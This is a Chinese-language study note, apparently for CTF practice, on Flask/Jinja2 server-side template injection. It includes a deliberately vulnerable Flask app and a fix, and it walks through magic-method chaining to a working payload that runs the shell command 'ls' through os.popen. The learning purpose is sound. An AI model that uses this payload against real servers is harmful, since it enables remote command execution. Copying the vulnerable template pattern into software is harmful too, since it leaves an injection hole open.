Python模块注入

注：只是自己学习记录，若有不对的地方请指出，如果觉着我写的不好或者什么的，可以去看我放在下面的大师傅的讲解，都是比较详细的

---

简单的flask

#encoding: utf-8?
# 导入Flask类
from flask import Flask, render_template_string, request
# 实例化，可视为固定格式
app = Flask(__name__)
@app.route('/test/')
def test():
    code = request.args.get('id')
    html = '''
        
%s
    '''%(code)
    return render_template_string(html)
if __name__ == '__main__':
    # app.run(host, port, debug, options)
    # 默认值：host="127.0.0.1", port=5000, debug=False
    app.run(host="0.0.0.0", port=5000)

注：以上代码存在ssti漏洞点在于render_template_string函数在渲染模板的时候使用了%s来动态的替换字符串，我们知道Flask 中使用了Jinja2 作为模板渲染引擎，{{}}在Jinja2中作为变量包裹标识符，Jinja2在渲染的时候会把{{}}包裹的内容当做变量解析替换。
解决方法：
 将template 中的 ”’
%s!
”’% request.url 更改为 ”’
{{request.url}}
”’ ，这样以来，Jinja2在模板渲染的时候将request.url的值替换掉{{request.url}}, 而不会对request.url内容进行二次渲染(这样即使request.url中含有{{}}也不会进行渲染，而只是把它当做普通字符串)，模板注入就是将一串指令代替变量传入模板中让它执行，例如我们在传入‘code’的值时，可以使用{{}}符号来包裹一系列代码，以此代替本应该是参数的id.
 如下：hhtp://127.0.0.1/?id={{xxx}}

python常见的魔法方法：
__class__  返回类型所属的对象（类）
__mro__    返回一个包含对象所继承的基类元组，方法在解析时按照元组的顺序解析。
__base__   返回该对象所继承的基类
// __base__和__mro__都是用来寻找基类的
__subclasses__   每个类都保留了子类的引用，这个方法返回一个类中仍然可用的的引用的列表
__init__  类的初始化方法，相当于一个声明
__globals__  对包含函数全局变量的字典的引用

__class__可以获取当前实例的对象（类）
如：
>>> "".__class__  
<class 'str'>
 
 __mro__和__base__都是获取当前类的所有继承类
如：
>>> "".__class__.__mro__
(<class 'str'>, <class 'object'>)
 
__subclasses__每个类都保留了子类的引用，这个方法返回一个类中仍然可用的的引用的列表
如：
>> "".__class__.__base__.__subclasses__()
[<class 'type'>, <class 'weakref'>, <class 'weakcallableproxy'>,………………..

做题的思路：

通过python的对象的继续来一步步实现文件的读取和命令执行的
首先用__class__读取当前类对象的类
然后用__mro__或者__base__寻找基类
然后用__subclasses__找命令执行或者文件操作的模块
然后使用__init__声明
然后使用__globals__引用模块
简单说一下我的做题经历
做题环境再bugku，buuctf，攻防世界都有，我拿一个我在本地搭建的环境来当作题目
把下面的代码运行，就得到了一个简单的ssit题目

#encoding: utf-8?
#导入Flask类
from flask import Flask, render_template_string, request
#实例化，可视为固定格式
app = Flask(__name__)
@app.route('/test/')
def test():
    code = request.args.get('id')
    html = '''
        
%s
    '''%(code)
    return render_template_string(html)
if __name__ == '__main__':
    # app.run(host, port, debug, options)
    # 默认值：host="127.0.0.1", port=5000, debug=False
    app.run(host="0.0.0.0", port=5000)
#访问地址：本机IP

第一步,测试：
输入?id={{88}}，成功返回了88的计算结果，说明8*8这条指令被服务器执行了，也可以输入?id={{config}}，如果成功执行也代表存在模板注入

第二步,读取当前字符的类：

?id={{config.__class__}}

第三步，查找基类：

 ?id={{config.__class__.__mro__}}

第四步，选择基类查找命令执行或者文件操作的模块：

?id={{config.__class__.__mro__[2].__subclasses__()}}

因为这里object在第三位，而python是从0开始计数的所以写2，为什么选择object，因为所有类的父类，默认所有的类都继承至Object类

这么多模块，要找到我们想用的模块，这样看有点乱，很多师傅直接编写代码得到想用的模块，我用一种比较笨的方法查找需要用的模块
负责页面的模块，然后编写代码，重新输出，复制到新的文本，然后查找模块
重新输入的代码：

for a in [" "," …………"," "]:#注意要把原先的( , )替换成","
print(a)

然后复制到新的文本，查找popen
位置是415，往前进一位就是414
第五步，引用模块，执行命令：

?id={{config.__class__.__mro__[2].__subclasses__()[414].__init__.__globals___['os'].popen('ls').read()}}

完成
python 模板注入 - tr1ple - 博客园 (cnblogs.com)
从零学习flask模板注入 - FreeBuf网络安全行业门户
Flask SSTI服务端模板注入初探_哔哩哔哩_bilibili
SSTI模板注入与Flask基础_哔哩哔哩_bilibili